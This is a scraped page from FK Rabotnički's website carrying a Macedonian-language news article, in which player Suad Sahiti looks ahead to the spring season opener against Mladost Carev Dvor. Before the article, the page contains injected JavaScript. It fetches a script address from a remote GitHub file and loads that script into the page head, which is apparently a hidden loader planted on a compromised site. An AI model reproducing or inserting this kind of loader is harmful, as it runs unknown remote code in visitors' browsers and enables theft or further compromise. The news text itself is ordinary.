;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Сахити: Со триумф да ја отвориме пролетната полусезона
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Сахити: Со триумф да ја отвориме пролетната полусезона

Работнички утре, со почеток од 14 часот, на комплексот на ФФМ ќе го одигра првиот пролетен натпревар, пречекувајќи го Младост Царев Двор на отворањето на пролетната полусезона. Со јасни амбиции да излезат на европска сцена и следната сезона, фудбалерите на Томислав Франц, кој го презеде кормилото оваа зима од Игор Ангеловски, се силни мотивирани да остварат триумф на стартот од втората фудбалска полуетапа.

„Сите наши мисли се насочени кон триумф и три бода. Значајно е да се победи на стартот, да се фати вистински залет за пролетта, од која очекуваме многу, и во првенството, но и во Купот на Македонија. Мислам дека сме добро подготвени, мотивацијата е на највисоко можно ниво и останува утре на теренот да покажеме дека сме поквалитетен тим од Младост Царев Двор. Го респектираме противникот, но и веруваме во сопствените можности. Имавме одредени промени во составот оваа зима, имаме и нов шеф на стручниот штаб, но нашиот стил на игра останува ист како и досега, со офанзивен пристап и агресивна игра да го наттрчаме и да го надмудриме ривалот“, вели Суад Сахити.

Работнички влегува во пролетниот дел од шампионатот од четвртата позиција, додека Младост Царев Двор е деветтопласиран тим, со освоени 16 бода, по 18 одиграни кола.

Leave a Reply